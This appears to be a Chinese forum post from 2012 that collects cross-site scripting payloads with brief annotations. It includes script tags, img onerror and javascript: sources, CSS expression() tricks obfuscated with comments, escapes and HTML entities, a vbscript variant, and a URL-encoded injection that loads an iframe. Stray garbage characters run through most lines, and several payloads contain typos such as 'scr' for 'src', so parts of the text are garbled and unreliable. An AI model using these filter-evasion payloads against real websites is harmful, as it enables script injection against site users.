<script>alert("跨站")</script> (最常用)$ X, R* a _ u
<img scr=javascript:alert("跨站")></img>
! M! R! E1 {: d<img scr="javascript: alert(/跨站/)></img>' r# Y* g0 ~0 p
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
! ~! P" }; N- \$ R. G<img scr="#" onerror=alert(/跨站/)></img>
. J6 d: w& X' \- Y+ a9 b; `2 q<img scr="#" style="xss:expression(alert(/xss/));"></img>
. w# \1 o, O/ ?( b% }3 v9 _<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
4 q9 s+ L/ d! k<img src=vbscript:msgbox ("xss")></img> ^) I, `0 Y9 l! H1 _/ E& w
<style> input {left:expression (alert('xss'))}</style>2 f" L' j K: [5 ~* x( ]# j: T, E& i3 u/ R
<div style={left:expression (alert('xss'))}></div>" y6 W: }. J+ {( i
<div style={left:exp/* */ression (alert('xss'))}></div>
& X+ g' a! t, u+ h, H" `. i/ ?<div style={left:\0065\0078ression (alert('xss'))}></div>
% v5 n1 l+ X7 O3 Uhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>2 A% |2 H! H6 i
unicode <div style="{left:expRessioN (alert('xss'))}">
w( U1 H) `" J3 L4 k7 e3 h2 Y% w: u6 @- {
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
9 k) x1 l3 l% ~ |
发表于 2012-9-15 14:09:13
收藏
支持
反对